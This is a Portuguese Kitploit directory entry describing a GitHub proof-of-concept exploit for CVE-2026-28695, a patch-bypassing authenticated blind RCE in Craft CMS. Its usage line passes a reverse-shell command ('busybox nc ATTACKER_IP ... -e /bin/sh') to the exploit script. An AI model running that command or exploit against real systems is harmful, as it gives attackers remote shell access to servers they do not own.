Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-28695 — Exploit PoC em Python para CVE-2026-28695, um RCE cego autenticado no Craft CMS que contorna o patch create() do BaseObject e gera um reverse shell. | Kitploit
Ferramentas/GitHubGitHub/predyy/cve-2026-28695
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoSegurança WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubpredyy/cve-2026-28695

CVE-2026-28695

Exploit PoC em Python para CVE-2026-28695, um RCE cego autenticado no Craft CMS que contorna o patch create() do BaseObject e gera um reverse shell.

13há 4 diasAinda não revisado
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-28695 Bypass de Patch - RCE Cego no Craft CMS

Execução remota de código cega e autenticada no Craft CMS. Contorna a restrição create() - BaseObject adicionada na correção do CVE-2026-28695 (commit e31e508).

Uso

python3 exp.py -t http://target.htb -u user -p 'password' -c 'busybox nc ATTACKER_IP ATTACKER_PORT -e /bin/sh'

Aviso Legal

Este script destina-se apenas a fins educacionais. O autor não é responsável por qualquer uso indevido ou dano causado por este exploit. Certifique-se sempre de que tem permissão antes de testar ou explorar vulnerabilidades!

Baixar ferramenta